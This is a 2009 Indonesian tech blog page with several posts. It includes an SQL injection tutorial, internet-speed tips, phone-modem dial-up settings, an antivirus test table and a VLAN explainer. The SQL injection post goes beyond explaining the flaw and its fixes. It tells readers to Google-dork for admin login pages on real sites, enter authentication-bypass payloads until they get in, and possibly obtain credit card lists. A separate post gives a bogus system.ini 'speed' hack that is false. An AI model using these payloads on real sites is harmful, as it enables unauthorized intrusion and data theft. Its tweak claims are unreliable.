Selasa, 28 Juli 2009

TUTORIAL SQL INJECTION


TUTORIAL SQL INJECTION

Pengertian SQL Injection
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.


Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Contoh sintaks SQL Injection
1) Sintaks SQL string ‘-- setelah nama username
2) Query database awal :

Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :


3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :


Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW XYZ"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}


3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.


Hacking adalah seni bukan Kejahatan. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.

Senin, 20 Juli 2009

Software yang Dapat Menambah Kecepatan Koneksi Internet

Koneksi internet anda lelet? Silahkan anda coba software Onspeed 6.0.9 , software ini bisa meningkatkan kecepatan internet anda hingga 10 kali lipat!!!(Dial-up – 10x Faster, Broadband – 5x Faster, Mobile connections – 8x Faster). Saya pribadi memang tidak menggunakan software ini (karena selama ini memakai koneksi lewat warnet terus), tapi bolehlah anda coba (taruh komentar anda ya... apakah software ini benar-benar berfungsi apa tidak)


Di bawah ini ada beberapa software lainnya yang bisa anda gunakan untuk meningkatkan kecepatan browsing internet anda:

- Flash Speed 200%
Flash Speed 200% is an Internet accelerator that help you optimize your Internet connection speed 200% or more. The software changes some Windows settings to give you faster performance, and optimize your Internet connection speed 200% or more according to your computer. It support optimiz Dial-Up, Lan, Cable, ADSL, HDSL, VDSL and PPPoE connections up to 200% faster. Increase your download speeds.

- CFosSpeed
Tool ini Untuk Mempercepat Akses Internet Cocok Buat Koneksi Lemot (Traffic Compresson System)



- Dsl Speed
DSL Speed is a prefessional tool that will online optimize your
DSL(e.g.,ADSL,G.lite,IDSL,SDSL)connection speed to MAX.
Main Features:
Online optimize your DSL (ADSL) connection speed.
Auto verify your ISP's MTU and your DSL (ADSL) unique optimize
value.
Faster loading Web Pages.
Tweaks DNS Errors Caching In Windows 2000/XP.
Tweaks ICS In Windows 98SE.



- Internet Turbo
Software untuk meningkatkan kecepatan internet



- Modem Boster
Software untuk mempercepat kinerja Modem



- Firefox Ultimate Optimizer
Software untuk optiamasi Browser firefox



- Fasterfox
Add-ons untuk browser Firefox. Setelah Fasterfox selesai terinstall, restart Firefox anda. Tanda kalau Fasterfox sudah terinstall di Firefox anda adalah akan ada gambar rubah kecil di sisi kanan bawah Firefox anda.



- Google Web Accelerator
Tanda kalo GoogleWebAccelerator sudah terinstall di web browsing anda adalah akan ada gambar jam kecil di web browsing anda. GoogleWebAccelerator akan menunjukkan berapa banyak waktu yang telah dihemat karena menggunakan GoogleWebAccelerator.



- FullSpeed2.7

Dramatically speed up your existing Internet broadband connection and get the best performance possible from your current Internet connection. Full Speed will increase your online Internet speed with everything you do: faster downloading, web browsing and web page loading, data streaming, email, P2P and gaming. Full Speed will also improve the performance of business communications which utilise Broadband technologies including Remote Desktop sessions, Intranets and Extranets over VPN's and WANs . One click it's done; no questions or any knowledge is required. Full Speed has a 'Clean' Award from Softpedia confirming that it is completely Spyware FREE. Full Speed also has no banners, popups, adverts, contracts, subscriptions, viruses or malware of any kind. Free performance testing software is also included for testing and comparison of download speeds and Web browsing performance.



Note:
Untuk software-software yang lain, saya sarankan untuk mengunjungi situs yahoo groups warnet underground (Anda harus join/punya account yahoo untuk bisa login & download). Disana tersedia banyak software yang berguna untuk optimasi internet!

Tweaking Windows Untuk Mempercepat Computer

Tweaking Windows Untuk Mempercepat Computer

Pada kali ini gw akan membahas bagaimana mempercepat kinerja komputer yang kita miliki sehingga performance lebih baik dengan sedikit Tweaking dan Modifikasi pada setting Windows computer kita. Hal ini sangat membantu untuk mempercepat Kinerja computer kita yang mungkin anda rasa masih lamban seperti bila kita masih menggunakan PC setara pentium III atau Pentium 4.

Dengan menerapkan Modifikasi, optimiser, Tweaking seeting Registry pada Windows maka hal ini akan mengoptimalkan kerja dari Computer agar bekerja lebih cepat dari sebelumnya.

Berikut langkah Optimasi untuk mempercepat kinerja Komputer :

A. Matikan beberapa fitur Start Up.

Hal ini akan mempercepat loading Windows pada waktu Booting atau pertama kali kita menghidupkan Komputer.

* Masuk menu RUN >>> Ketikan MSCONFIG >> OK >> Pilih menu Start Up >> Hilangkan semua cawang pada Start up kecuali Program Anti virus
* Klik Menu service >> Hilangkan cawang pada Automatic Updates
* Setelah itu >>> Aplly >>> Ok

Hal ini memerlukan Restart Windows, Setelah itu ada Message Windows dan pilih dont show this message again. Kemudian lanjutkan ke Optimasi pada Registry Windows di bawah ini.


B. Optimasi Pada Registry

Rubah Registry Windows pada bagian berikut ini.

* MASUK RUN >> Ketik REGEDIT >> >> OK
* MY COMPUTER >>> HKEY_CURRENT_USER >> CONTROL PANEL >> DESKTOP >>
* Cari MENU SHOW DELAY >> Doble Klik dan rubah value data menjadi 10
* Cari HUNG-UP TIME OUT >> Doble Klik rubah value dataya menjadi 5
* MY COMPUTER >> HKEY_LOCAL_MACHINE >> SYSTEM >> CONTROLSET001 >> CONTROL >> WAIT TO KILL SERVICE >> Rubah Valuenya menjadi 500
* MY COMPUTER >> HKEY_LOCAL_MACHINE >> SYSTEM >> CURRENT CONTROL Set> COntrol >> SESION MANAGER >> MEMORY MANAGEMENT >> DISABLE PAGING EXCecutive >> Rubah Value data menjadi 1

C. Optimalkan Virtual Memory

* Masuk Control Panel >> System >> Advanced >> Performance Setting >>> Pilih Custom >> Cawang pada : “Use Drop Shadow For Icon labels on the dekstop” dan “Use Visual styles on windows and buttons” dan kemudian aplly.

* Pada menu advanced >>> Virtual memory >> Change >> Klik pada drive c:Windows >> Pilih Custom Size >> Rubah Value pada initial size dan maximum Size 2 kali lipat dari value sebelumnya misal 256 rubah ke 512 , 512 rubah 1000) atau anda bisa merubah sesuai keinginan anda asal lebih besar dari value sebelumnya, Kemudian klik Ok.

Tweaking dan modifikasi diatas bertujuan untuk mengoptimalkan dan mempercepat proses kerja suatu program atau software. Dan untuk mencegah peringatan / warning Virtual memory too low pada saat menjalankan program yag berat seperti Adobe Photoshob, Corel Draw, Adobe Premiere, Pinacle dan program berat lain yang memerlukan Virtual memory yang besar. Dan juga hal ini untuk mendukung Memory Ram yang kecil sehingga masih bisa digunakan untuk menjalankan progam berat tersebut.

Setelah selesai Restart komputer anda maka Kinerja dan Performance Computer anda akan lebih cepat dari sebelumnya. Selamat Mencoba.

Posted by Mamoru Naganao

Koneksi Internet Menggunakan Hp

Di jaman yang serba canggih sekarang membuat orang membutuhkan banyak informasi...menuntut kita untuk lebih sering mengakses internet...berawal dari semakin mahalnya koneksi internet membuat aku mencari alternatif lain dalam melakukan koneksi internet....aku pun beralih ke ponsel...setelah mencari cari-cari informasi menggunakan paman google dan bertapa 7 hari 7 malam(hehehe....)akhirnya i find the way untuk mengkoneksikan hape aku ke komputer...Finaly......dengan berbekal hape 6600 yang memang udah lama aku miliki serta dengan kartu simpati yang hanya tersisa 10000.tidak lupa bluetooth sebagai conectornya.setelah browsing selama beberapa menit kulihat pulsaku langsung berkurang drastis..akupun beralih ke kartu im3 yang memang memasang tarif murah untuk koneksi gprs...dan akupun melanjutkan petualanganku di dunia maya...setelah aku cek,pulsaku hanya berkurang beberapa ribu...wah asyik banget....what are you waiting for...tapi itu tergantung berapa banyak halaman situs yang kita buka.karena mereka bukan menggunakan hitungan per menit tapi per kylobitenya.jadi jangan coba coba browsing sambil download dan chatting.karena aku tidak tanggung resikonya...tapi setelah aku lama berpikir,menimbang,dan menela'ah(hehehe).......kalo kita buka internet hanya untuk mencari informasi belaka..memang menggunakan hape lebih ekonomis dan juga pengiriman data lebih cepat bisa mencapai 115 kbps...ketika kita sedang membaca maka tidak ada pengiriman data sehingga pulsa kita tidak akan terpotong.tapi jika kita menggunakan internet untuk download...aku sarankan lebih baik kita menggunakan telkomnet instan karena mereka memasang tarif permenit...tapi im3 sekarang juga memasang 2 pilihan yaitu volume based(data) dan Timebased(waktu) dan untuk time based kalo tidak salah dikenakan Rp 100/menit (untuk lebih jelasnya tanya ke operator langsung)..
Nah sekarang saatnya aku kasih tau cara mengkoneksikan hape kamu ke komputer:yang perlu kamu siapkan adalah...1.hape(aku menggunakan hape 6600)2.conector(bisa bluetooth,infra red atau kabel data)bisa di cari di toko komputer terdekat3.sim card(yang masih ada pulsa minimal Rp 5000 dan masih aktif)pada praktek ini kita gunakan kartu IM3
sekarang kamu koneksikan hape kamu ke komputer..terserah menggunakan apa..jika menggunakan kabel data,install dulu drivernya.dan jika menggunakan bluetooth atau ifrared lakukan pairing terlebih dahulu..setelah komputer terkoneksi...buka control panel dan klik phone and modem option..jika sudah terkoneksi maka disana akan tertulis hape kamu sebagai modem..jika kamu sudah melihat hape kamu didaftar modem berarti your hp is conecctedsekarang buka control panel-network connection
1.control panel-network connection2.new connection-connect to internet-set up my connection manually3.connect using a dial up modem lalu di next aja terus4.ISP name diisi aja T-net(atau boleh juga bebas)5.phone number isi *99***1#6.user name=gprs pasword=im3 lalu finish
jika semua langkah diatas sudah dilakukan maka di desktop akan muncul connection yang kita buat.atau kalo belum ada kamu bisa buka start-connect to-T-net.klik 2 x kemudian dial...sampe tahap ini sebenarnya udah 90% berhasil.sekarang tinggal tunggu aja sambil berdoa semoga berhasil...jika berhasil...pada traybar anda akan muncul icon koneksi..selamat anda sudah bisa berinternet ria.....
untuk lebih memudahkan lagi saya cantumkan daftar user name,pasword,dan dial setiap operator

operator user name pasword dial
1.Simpati wap wap123 *99***1#
2.halo wap wap123 *99***1#
3.matrix (dikosongkan) (dikosongkan) *99***1#
4.im3 gprs im3 *99***1#
5.Fren m8 m8 #777
6.telkomflexi telkomnet@flexi telkom #777
7.star one starone indosat #777
8.xl xlgprs proxl *99***1#

untuk tarifnya bisa tanya langsung ke operator masing masing...oh ya sedikit tambahan,untuk yang memakai im3 jika mau menggunakan time based(hitungan per menit) user name dan paswordnya indosat@durasi...

Uji Coba Anti Virus

Jakarta - Sebuah uji antivirus baru-baru ini dilakukan oleh seorang konsultan keamanan secara independen. Setidaknya ada 35 merek antivirus dunia yang dijajal kekuatannya melawan berbagai virus maupun program jahat yang dibuatnya sendiri.

Chaz Sowers, nama konsultan tersebut, mengaku menjalankan metodologi yang tidak memihak dan tes ini tidak menggunakan metode ilmiah double-blind. "Paling tidak, saya mempunyai tujuan untuk mencari solusi antivirus yang terbaik untuk komputer saya sendiri. Di atas semuanya, tolong diingat: saya sedang mencari sebuah produk antivirus yang mampu mengidentifikasi dan menghapus jumlah terbanyak dari tes malware yang saya miliki," jelasnya.

Fokus pada tes ini memang pada banyaknya jumlah yang dapat dideteksi dan juga perangkat lunak yang melaporkan 'kesalahan positif' dengan jumlah besar dari serbuan virus dan malware yang dilancarkan ke antivirus yang diuji.

Untuk menjalankan tes tersebut Chaz menggunakan sistem operasi Windows XP baru pada mesin virtual Sun Virtual Box. Instalasi Windows telah sepenuhnya diperbaharui (termasuk SP3) per 8 Januari 2009.

Setiap program antivirus disalin ke komputer utama dari shared folder dan merupakan satu-satunya program pada mesin virtual yang bukan bagian dari Windows install biasa. Tes data yang masuk disimpan di drive D dan terdiri dari 36.438 malware yang semuanya pernah dan atau sedang beredar.

Sementara dari hardware yang digunakan terdiri dari prosesor AMD Sempron 2600-Plus, motherboard Asus A7N8X-E, 3 GB RAM DDR 184 pin, sebuah hard drive Seagate 190GB SATA, dan sebuah video card nVidia.

Siapa yang menang dari berbagai produk antivirus dunia yang diuji tersebut? Berikut adalah hasilnya yang dikutip detikINET dari csoonline, Selasa (16/6/2009):

Posisi – Produk -- Malware Terdeteksi – Total %

1. -- G Data -- 36,423 -- 99.95%
2. -- Trust Port -- 36,171 -- 99.26%
3. -- eScan -- 36,146 -- 99.20%
5. -- BitDefender -- 36,105 -- 99.08%
6. -- Avira -- 35,846 -- 98.37%
7. -- Hauri -- 35,325 -- 96.94%
8. -- Trend Micro -- 35,182 -- 96.55%
9. -- DrWeb -- 34,114 -- 93.62%
10. -- F-Prot -- 32,635 -- 89.56%
11. -- Ashampoo -- 32,291 -- 88.61%
12. -- Panda -- 31,719 -- 87.04%
13. -- BullGuard -- 31,608 -- 86.74%
14. -- PCTools -- 30,023 -- 82.39%
15. -- Arcabit -- 28,944 -- 79.43%
16. -- Rising Software -- 27,991 -- 76.81%
17. -- Clam -- 27,247 -- 74.77%
18. -- CA -- 24,996 -- 68.59%
19. -- ESET -- 23,746 -- 65.16%
20. -- VBA -- 22,417 -- 61.52%
21. -- AhnLab -- 21,301 -- 58.45%
22. -- Norton (Symantec) -- 20,404 -- 55.99%
23. -- Kaspersky -- 20,289 -- 55.68%
25. -- File Sentry -- 111 -- 3.04%
26. -- AVG -- 110 -- 3.01%
27. -- Hacker Eliminator -- 1 -- 0%

Beberapa antivirus ada yang dieliminasi karena mereka melaporkan jumlah malware yang lebih banyak dibandingkan dengan jumlah yang ada pada komputer itu sebenarnya (kesalahan positif): Comodo, DrWeb CureIt, F-Secure dan McAfee.

Pun demikian, di akhir pengujian Chaz membuat disclaimer bahwa hasil pengujian ini jangan dijadikan sebagai satu-satunya dasar untuk membeli suatu antivirus tertentu. Selain itu, tidak ada satupun dari produk ini yang disarankan olehnya atau asosiasi profesional ia miliki sertifikasinya.
Cara Mempercepat Akses Internet Sep 1, '07 9:31 AM
for everyone

Adapun Prosedurnya adalah sbb :

1. Klik Buton Start Komputer Anda anda dan pilih Menu "Run"

2. Setelah Masuk Menu "Run" anda Ketik "system.ini"

3. Setelah Terbuka nanti ada Tulisan Seperti di bawah ini

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

4 Tambahkan dengan tulisan yang dibawah ini pada bagian bawah poin 3 di atas

page buffer=100000kbps load=100000kbps download=100000kbps save=100000kbps back=100000kbps

5. Nanti Hasilnya Seperti yang Tertera dibawah ini.

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
page buffer=100000kbps load=100000kbps download=100000kbps save=100000kbps back=100000kbps

6. save dan exit notepad system.ini

7. Selamat Mencoba

Apa Itu Vlan (Virtual Local Area Network)

Apa Itu Vlan (Virtual Local Area Network)

PENGANTAR

Pemanfaatan teknologi jaringan komputer sebagai media komunikasi data hingga saat ini semakin meningkat. Kebutuhan atas penggunaan bersama resources yang ada dalam jaringan baik software maupun hardware telah mengakibatkan timbulnya berbagai pengembangan teknologi jaringan itu sendiri. Seiring dengan semakin tingginya tingkat kebutuhan dan semakin banyaknya pengguna jaringan yang menginginkan suatu bentuk jaringan yang dapat memberikan hasil maksimal baik dari segi efisiensi maupun peningkatan keamanan jaringan itu sendiri.
Berlandaskan pada keinginan-keinginan tersebut, maka upaya-upaya penyempurnaan terus dilakukan oleh berbagai pihak. Dengan memanfaatkan berbagai tekhnik khususnya teknik subnetting dan penggunaan hardware yang lebih baik (antara lain switch) maka muncullah konsep Virtual Local Area Network (VLAN) yang diharapkan dapat memberikan hasil yang lebih baik dibanding Local area Network (LAN).

PENGERTIAN

VLAN merupakan suatu model jaringan yang tidak terbatas pada lokasi fisik seperti LAN , hal ini mengakibatkan suatu network dapat dikonfigurasi secara
virtual tanpa harus menuruti lokasi fisik peralatan. Penggunaan VLAN akan membuat pengaturan jaringan menjadi sangat fleksibel dimana dapat dibuat
segmen yang bergantung pada organisasi atau departemen, tanpa bergantung pada lokasi workstation seperti pada gambar dibawah ini

Gambar Jaringan VLAN


BAGAIMANA VLAN BEKERJA

VLAN diklasifikasikan berdasarkan metode (tipe) yang digunakan untuk mengklasifikasikannya, baik menggunakan port, MAC addresses dsb. Semua
informasi yang mengandung penandaan/pengalamatan suatu vlan (tagging) di simpan dalam suatu database (tabel), jika penandaannya berdasarkan
port yang digunakan maka database harus mengindikasikan port-port yang digunakan oleh VLAN. Untuk mengaturnya maka biasanya digunakan
switch/bridge yang manageable atau yang bisa di atur. Switch/bridge inilah yang bertanggung jawab menyimpan semua informasi dan konfigurasi
suatu VLAN dan dipastikan semua switch/bridge memiliki informasi yang sama.
Switch akan menentukan kemana data-data akan diteruskan dan sebagainya atau dapat pula digunakan suatu software pengalamatan (bridging software)
yang berfungsi mencatat/menandai suatu VLAN beserta workstation yang didalamnya.untuk menghubungkan antar VLAN dibutuhkan router.

TIPE TIPE VLAN

Keanggotaan dalam suatu VLAN dapat di klasifikasikan berdasarkan port
yang di gunakan , MAC address, tipe protokol.

1. Berdasarkan Port

Keanggotaan pada suatu VLAN dapat di dasarkan pada port yang di gunakan oleh
VLAN tersebut. Sebagai contoh, pada bridge/switch dengan 4 port, port 1, 2,
dan 4 merupakan VLAN 1 sedang port 3 dimiliki oleh VLAN 2, lihat tabel:

Tabel port dan VLAN

Port 1 2 3 4
VLAN 2 2 1 2

Kelemahannya adalah user tidak bisa untuk berpindah pindah, apabila harus
berpindah maka Network administrator harus mengkonfigurasikan ulang.

2. Berdasarkan MAC Address

Keanggotaan suatu VLAN didasarkan pada MAC address dari setiap workstation /komputer yang dimiliki oleh user. Switch mendeteksi/mencatat semua MAC
address yang dimiliki oleh setiap Virtual LAN. MAC address merupakan suatu bagian yang dimiliki oleh NIC (Network Interface Card) di setiap workstation.
Kelebihannya apabila user berpindah pindah maka dia akan tetap terkonfigurasi sebagai anggota dari VLAN tersebut.Sedangkan kekurangannya bahwa setiap mesin harus di konfigurasikan secara manual , dan untuk jaringan yang memiliki ratusan workstation maka tipe ini kurang efissien untuk dilakukan.

Tabel MAC address dan VLAN

MAC address 132516617738 272389579355 536666337777 24444125556
VLAN 1 2 2 1

3. Berdasarkan tipe protokol yang digunakan
Keanggotaan VLAN juga bisa berdasarkan protocol yang digunakan, lihat tabel

Tabel Protokol dan VLAN

Protokol IP IPX
VLAN 1 2

4. Berdasarkan Alamat Subnet IP
Subnet IP address pada suatu jaringan juga dapat digunakan untuk mengklasifikasi
suatu VLAN

Tabel IP Subnet dan VLAN

IP subnet 22.3.24 46.20.45
VLAN 1 2

Konfigurasi ini tidak berhubungan dengan routing pada jaringan dan juga tidak mempermasalahkan funggsi router.IP address digunakan untuk memetakan keanggotaan VLAN.Keuntungannya seorang user tidak perlu mengkonfigurasikan ulang alamatnya di jaringan apabila berpindah tempat, hanya saja karena bekerja di layer yang lebih tinggi maka akan sedikit lebih lambat untuk meneruskan paket di banding
menggunakan MAC addresses.

5. Berdasarkan aplikasi atau kombinasi lain
Sangat dimungkinkan untuk menentukan suatu VLAN berdasarkan aplikasi yang dijalankan, atau kombinasi dari semua tipe di atas untuk diterapkan pada suatu
jaringan. Misalkan: aplikasi FTP (file transfer protocol) hanya bias digunakan oleh VLAN 1 dan Telnet hanya bisa digunakan pada VLAN 2.

PERBEDAAN MENDASAR ANTARA LAN DAN VLAN

Perbedaan yang sangat jelas dari model jaringan Local Area Network dengan Virtual Local Area Network adalah bahwa bentuk jaringan dengan model Local
Area Network sangat bergantung pada letak/fisik dari workstation, serta penggunaan hub dan repeater sebagai perangkat jaringan yang memiliki beberapa
kelemahan. Sedangkan yang menjadi salah satu kelebihan dari model jaringan dengan VLAN adalah bahwa tiap-tiap workstation/user yang tergabung dalam
satu VLAN/bagian (organisasi, kelompok dsb) dapat tetap saling berhubungan walaupun terpisah secara fisik. Atau lebih jelas lagi akan dapat kita
lihat perbedaan LAN dan VLAN pada gambar dibawah ini.

Gambar konfigurasi LAN

[hub]-[1]-[1]-[1] <– lan 1/di lantai 1
|
[x]–[hub]-[2]-[2]-[2] <– lan 2/di lantai 2
|
[hub]-[3]-[3]-[3] <– lan 3/di lantai 3


Gambar konfigurasi VLAN


Terlihat jelas VLAN telah merubah batasan fisik yang selama ini tidak dapat diatasi oleh LAN. Keuntungan inilah yang diharapkan dapat memberikan
kemudahan-kemudahan baik secara teknis dan operasional.

To be Continue

Karena waktu posting ada message "1. The text that you have entered is too long (18119 characters). Please shorten it to 15000 characters long."


PERBANDINGAN VLAN DAN LAN

A.Perbandingan Tingkat Keamanan

Penggunaan LAN telah memungkinkan semua komputer yang terhubung dalam jaringan dapat bertukar data atau dengan kata lain berhubungan. Kerjasama ini semakin berkembang dari hanya pertukaran data hingga penggunaan peralatan secara bersama (resource sharing atau disebut juga hardware sharing).10 LAN memungkinkan data tersebar secara broadcast keseluruh jaringan, hal ini akan mengakibatkan mudahnya pengguna yang tidak dikenal (unauthorized user) untuk dapat mengakses semua bagian dari broadcast. Semakin besar broadcast, maka semakin besar akses yang didapat, kecuali hub yang dipakai diberi fungsi kontrol keamanan.

VLAN yang merupakan hasil konfigurasi switch menyebabkan setiap port switch diterapkan menjadi milik suatu VLAN. Oleh karena berada dalam satu segmen, port-port yang bernaung dibawah suatu VLAN dapat saling berkomunikasi langsung. Sedangkan port-port yang berada di luar VLAN tersebut atau berada dalam naungan VLAN lain, tidak dapat saling berkomunikasi langsung karena VLAN tidak meneruskan broadcast.

VLAN yang memiliki kemampuan untuk memberikan keuntungan tambahan dalam hal keamanan jaringan tidak menyediakan pembagian/penggunaan media/data dalam suatu jaringan secara keseluruhan. Switch pada jaringan menciptakan batas-batas yang hanya dapat digunakan oleh komputer yang termasuk dalam VLAN tersebut. Hal ini mengakibatkan administrator dapat dengan mudah mensegmentasi pengguna, terutama dalam hal penggunaan media/data yang bersifat rahasia (sensitive information) kepada seluruh pengguna jaringan yang tergabung secara fisik.

Keamanan yang diberikan oleh VLAN meskipun lebih baik dari LAN,belum menjamin keamanan jaringan secara keseluruhan dan juga belum dapat dianggap cukup untuk menanggulangi seluruh masalah keamanan .VLAN masih sangat memerlukan berbagai tambahan untuk meningkatkan keamanan jaringan itu sendiri seperti firewall, pembatasan pengguna secara akses perindividu, intrusion detection, pengendalian jumlah dan besarnya broadcast domain, enkripsi jaringan, dsb.

Dukungan Tingkat keamanan yang lebih baik dari LAN inilah yang dapat dijadikan suatu nilai tambah dari penggunaan VLAN sebagai sistem jaringan.
Salah satu kelebihan yang diberikan oleh penggunaan VLAN adalah kontrol administrasi secara terpusat, artinya aplikasi dari manajemen VLAN dapat
dikonfigurasikan, diatur dan diawasi secara terpusat, pengendalian broadcast jaringan, rencana perpindahan, penambahan, perubahan dan pengaturan akses
khusus ke dalam jaringan serta mendapatkan media/data yang memiliki fungsi penting dalam perencanaan dan administrasi di dalam grup tersebut semuanya
dapat dilakukan secara terpusat. Dengan adanya pengontrolan manajemen secara terpusat maka administrator jaringan juga dapat mengelompokkan
grup-grup VLAN secara spesifik berdasarkan pengguna dan port dari switch yang digunakan, mengatur tingkat keamanan, mengambil dan menyebar data
melewati jalur yang ada, mengkonfigurasi komunikasi yang melewati switch, dan memonitor lalu lintas data serta penggunaan bandwidth dari VLAN saat
melalui tempat-tempat yang rawan di dalam jaringan.

B.Perbandingan Tingkat Efisiensi

Untuk dapat mengetahui perbandingan tingkat efisiensinya maka perlu di ketahui kelebihan yang diberikan oleh VLAN itu sendiri diantaranya:

•Meningkatkan Performa Jaringan
LAN yang menggunakan hub dan repeater untuk menghubungkan peralatan komputer satu dengan lain yang bekerja dilapisan physical memiliki
kelemahan, peralatan ini hanya meneruskan sinyal tanpa memiliki pengetahuan mengenai alamat-alamat yang dituju. Peralatan ini juga
hanya memiliki satu domain collision sehingga bila salah satu port sibuk maka port-port yang lain harus menunggu. Walaupun peralatan
dihubungkan ke port-port yang berlainan dari hub.

Protokol ethernet atau IEEE 802.3 (biasa digunakan pada LAN) menggunakan mekanisme yang disebut Carrier Sense Multiple Accsess Collision Detection
(CSMA/CD) yaitu suatu cara dimana peralatan memeriksa jaringan terlebih dahulu apakah ada pengiriman data oleh pihak lain. Jika tidak ada
pengiriman data oleh pihak lain yang dideteksi, baru pengiriman data dilakukan.
Bila terdapat dua data yang dikirimkan dalam waktu bersamaan, maka terjadilah tabrakan (collision) data pada jaringan. Oleh sebab itu
jaringan ethernet dipakai hanya untuk transmisi half duplex, yaitu pada suatu saat hanya dapat mengirim atau menerima saja.

Berbeda dari hub yang digunakan pada jaringan ethernet (LAN), switch yang bekerja pada lapisan datalink memiliki keunggulan dimana setiap port
didalam switch memiliki domain collision sendiri-sendiri. Oleh sebab itu sebab itu switch sering disebut juga multiport bridge. Switch
mempunyai tabel penterjemah pusat yang memiliki daftar penterjemah untuk semua port. Switch menciptakan jalur yang aman dari port pengirim dan
port penerima sehingga jika dua host sedang berkomunikasi lewat jalur tersebut, mereka tidak mengganggu segmen lainnya. Jadi jika satu port
sibuk, port-port lainnya tetap dapat berfungsi.

